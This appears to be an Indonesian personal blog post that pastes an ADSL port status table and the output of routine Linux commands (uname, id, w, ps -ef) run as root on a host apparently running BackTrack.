Adsl6/0/3 activating 0 0 0 0 0 0
Adsl6/0/4 active 31 45 14 10 384 64
Adsl6/0/5 active 31 31 9 11 384 64
Adsl6/0/6 activating 0 0 0 0 0 0
Adsl6/0/7 activating 0 0 0 0 0 0
Adsl6/0/8 activating 0 0 0 0 0 0
Adsl6/0/9 activating 0 0 0 0 0 0
Adsl6/0/10 activating 0 0 0 0 0 0
Adsl6/0/11 activating 0 0 0 0 0 0
Adsl6/0/12 activating 0 0 0 0 0 0
Adsl6/0/13 activating 0 0 0 0 0 0
Adsl6/0/14 activating 0 0 0 0 0 0
Adsl6/0/15 activating 0 0 0 0 0 0
Adsl6/0/16 activating 0 0 0 0 0 0
Adsl6/0/17 activating 0 0 0 0 0 0
Adsl6/0/18 activating 0 0 0 0 0 0
Adsl6/0/19 activating 0 0 0 0 0 0
Adsl6/0/20 activating 0 0 0 0 0 0
Adsl6/0/21 active 31 28 15 11 384 64
Adsl6/0/22 activating 0 0 0 0 0 0
Adsl6/0/23 active 31 31 15 9 384 64
Adsl6/0/24 active 23 24 13 10 384 64
Adsl6/0/25 active 31 44 14 10 384 64
Adsl6/0/26 activating 0 0 0 0 0 0
Adsl6/0/27 activating 0 0 0 0 0 0
Adsl6/0/28 activating 0 0 0 0 0 0
Adsl6/0/29 activating 0 0 0 0 0 0
Adsl6/0/30 activating 0 0 0 0 0 0
Adsl6/0/31 activating 0 0 0 0 0 0

CLI .......... Ku ........ Commandku ///////

lihat kernel
bt ~ # uname -a
Linux bt 2.6.21.5 #2 SMP Sat Aug 25 19:01:21 GMT 2007 i686 Intel(R) Pentium(R) M processor 1.60GHz GenuineIntel GNU/Linux

identitasku di unix
bt ~ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)

bt ~ # w
12:24:25 up 1:11, 3 users, load average: 0.98, 1.71, 1.28
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 11:28 55:44 0.05s 0.00s /bin/sh /usr/bin/startx
root pts/0 :0.0 11:29 1:02 0.04s 0.04s -bash
root pts/1 :0.0 12:06 0.00s 0.03s 0.00s w

lihat prosesnya
bt ~ # ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 11:12 ? 00:00:01 init [3]
root 2 1 0 11:12 ? 00:00:00 [migration/0]
root 3 1 0 11:12 ? 00:00:00 [ksoftirqd/0]
root 4 1 0 11:12 ? 00:00:00 [events/0]
root 5 1 0 11:12 ? 00:00:00 [khelper]
root 6 1 0 11:12 ? 00:00:00 [kthread]
root 85 6 0 11:12 ? 00:00:00 [kblockd/0]
root 86 6 0 11:12 ? 00:00:00 [kacpid]
root 180 6 0 11:12 ? 00:00:00 [ata/0]
root 181 6 0 11:12 ? 00:00:00 [ata_aux]
root 182 6 0 11:12 ? 00:00:00 [ksuspend_usbd]
root 185 6 0 11:12 ? 00:00:00 [khubd]
root 187 6 0 11:12 ? 00:00:00 [kseriod]
root 199 6 0 11:12 ? 00:00:00 [khpsbpkt]
root 204 6 0 11:12 ? 00:00:00 [knodemgrd_0]
root 210 6 0 11:12 ? 00:00:00 [pdflush]
root 211 6 0 11:12 ? 00:00:00 [pdflush]
root 212 6 0 11:12 ? 00:00:00 [kswapd0]
root 213 6 0 11:12 ? 00:00:00 [aio/0]
root 214 6 0 11:12 ? 00:00:00 [jfsIO]
root 215 6 0 11:12 ? 00:00:00 [jfsCommit]
root 216 6 0 11:12 ? 00:00:00 [jfsSync]
root 217 6 0 11:12 ? 00:00:00 [xfslogd/0]
root 218 6 0 11:12 ? 00:00:00 [xfsdatad/0]
root 219 6 0 11:12 ? 00:00:00 [ocfs2_wq]
root 220 6 0 11:12 ? 00:00:00 [user_dlm]
root 896 6 0 11:12 ? 00:00:00 [scsi_tgtd/0]
root 945 6 0 11:12 ? 00:00:00 [exec-osm/0]
root 950 6 0 11:12 ? 00:00:00 [block-osm/0]
root 995 6 0 11:12 ? 00:00:00 [scsi_eh_2]
root 1014 6 0 11:12 ? 00:00:00 [kcryptd/0]
root 1015 6 0 11:12 ? 00:00:00 [ksnapd]
root 1016 6 0 11:12 ? 00:00:00 [kmirrord]
root 1022 6 0 11:12 ? 00:00:00 [kjournald]
root 1093 1 0 11:12 ? 00:00:01 /sbin/udevd --daemon
root 1877 6 0 11:12 ? 00:00:00 [pccardd]
root 1878 6 0 11:12 ? 00:00:01 [ipw2200/0]
root 2603 6 0 11:13 ? 00:00:00 [kpsmoused]
root 2732 1 0 11:13 ? 00:00:00 /usr/sbin/syslogd
root 2736 1 0 11:13 ? 00:00:00 /usr/sbin/klogd -c 3 -x
root 2973 1 0 11:13 ? 00:00:00 /usr/sbin/acpid
root 2981 1 0 11:13 ? 00:00:00 /usr/bin/dbus-daemon --system
82 2986 1 0 11:13 ? 00:00:01 /usr/sbin/hald --daemon=yes
root 2987 2986 0 11:13 ? 00:00:00 hald-runner
82 2993 2987 0 11:13 ? 00:00:00 hald-addon-keyboard: listening on /dev/input/event0
82 2994 2987 0 11:13 ? 00:00:00 hald-addon-keyboard: listening on /dev/input/event1
82 2997 2987 0 11:13 ? 00:00:00 hald-addon-acpi: listening on acpid socket /var/run/acp
82 2998 2987 0 11:13 ? 00:00:00 hald-addon-keyboard: listening on /dev/input/event2
82 2999 2987 0 11:13 ? 00:00:00 hald-addon-keyboard: listening on /dev/input/event4
root 3008 2987 0 11:13 ? 00:00:00 hald-addon-storage: polling /dev/hdc (every 2 sec)
root 3017 1 0 11:13 ? 00:00:00 /usr/sbin/crond -l10
root 3052 1 0 11:13 ? 00:00:00 /usr/sbin/gpm -m /dev/mouse -t ps2
root 3074 1 0 11:13 tty1 00:00:00 -bash
root 3075 1 0 11:13 tty2 00:00:00 /sbin/agetty 38400 tty2 linux
root 3076 1 0 11:13 tty3 00:00:00 /sbin/agetty 38400 tty3 linux
root 3077 1 0 11:13 tty4 00:00:00 /sbin/agetty 38400 tty4 linux
root 3078 1 0 11:13 tty5 00:00:00 /sbin/agetty 38400 tty5 linux
root 3079 1 0 11:13 tty6 00:00:00 /sbin/agetty 38400 tty6 linux
root 3122 3074 0 11:28 tty1 00:00:00 /bin/sh /usr/bin/startx
root 3138 3122 0 11:28 tty1 00:00:00 xinit /usr/lib/X11/xinit/xinitrc -- /usr/lib/X11/xinit/
root 3139 3138 8 11:28 tty7 00:04:49 X -dpi 100 -nolisten tcp
root 3143 3138 0 11:28 tty1 00:00:00 /bin/sh /usr/lib/X11/xinit/xinitrc
root 3147 3143 0 11:28 tty1 00:00:00 /bin/sh /usr/bin/startkde
root 3177 1 0 11:28 tty1 00:00:00 start_kdeinit --new-startup +kcminit_startup
root 3178 1 0 11:28 ? 00:00:00 kdeinit Running...
root 3181 1 0 11:28 ? 00:00:00 dcopserver [kdeinit] --nosid
root 3183 3178 0 11:28 ? 00:00:00 klauncher [kdeinit] --new-startup
root 3185 1 1 11:28 ? 00:00:57 kded [kdeinit] --new-startup
root 3187 1 0 11:28 ? 00:00:00 /usr/libexec/gam_server
root 3192 3147 0 11:28 tty1 00:00:00 kwrapper ksmserver
root 3194 1 0 11:28 ? 00:00:00 ksmserver [kdeinit]
root 3195 3178 0 11:28 ? 00:00:05 kwin [kdeinit]
root 3197 1 0 11:28 ? 00:00:01 kdesktop [kdeinit]
root 3199 1 0 11:28 ? 00:00:05 kicker [kdeinit]
root 3200 3178 0 11:28 ? 00:00:00 kio_file [kdeinit] file /tmp/ksocket-root/klauncher1KLW
root 3202 1 0 11:29 ? 00:00:00 kxkb [kdeinit]
root 3207 1 0 11:29 ? 00:00:00 kaccess [kdeinit]
root 3212 1 0 11:29 ? 00:00:00 knotify [kdeinit]
root 3441 3178 0 11:29 ? 00:00:01 konsole [kdeinit] --ls
root 3445 3441 0 11:29 pts/0 00:00:00 -bash
root 3828 3178 0 11:31 ? 00:00:00 /bin/sh /usr/bin/firefox
root 3840 3828 0 11:31 ? 00:00:00 /bin/sh /usr/lib/firefox-2.0.0.9/run-mozilla.sh /usr/li
root 3848 3840 14 11:31 ? 00:07:41 /usr/lib/firefox-2.0.0.9/firefox-bin
root 3864 1 0 11:31 ? 00:00:00 /usr/local/libexec/gconfd-2 14
root 3884 3848 0 11:31 ? 00:00:00 [netstat]
root 6273 1 0 11:43 ? 00:00:00 dbus-launch --autolaunch 9260201c78269075eb28210046d031
root 6274 1 0 11:43 ? 00:00:00 /usr/bin/dbus-daemon --fork --print-pid 7 --print-addre
root 7875 3178 1 11:52 ? 00:00:37 pidgin
root 10059 1 0 12:03 ? 00:00:05 xmms file:///root/Five_Minutes_-_Rockmantic_-_02_Bertah
root 10600 3178 0 12:06 ? 00:00:00 konsole [kdeinit] --ls
root 10601 10600 0 12:06 pts/1 00:00:00 -bash
root 14088 10601 0 12:24 pts/1 00:00:00 ps -ef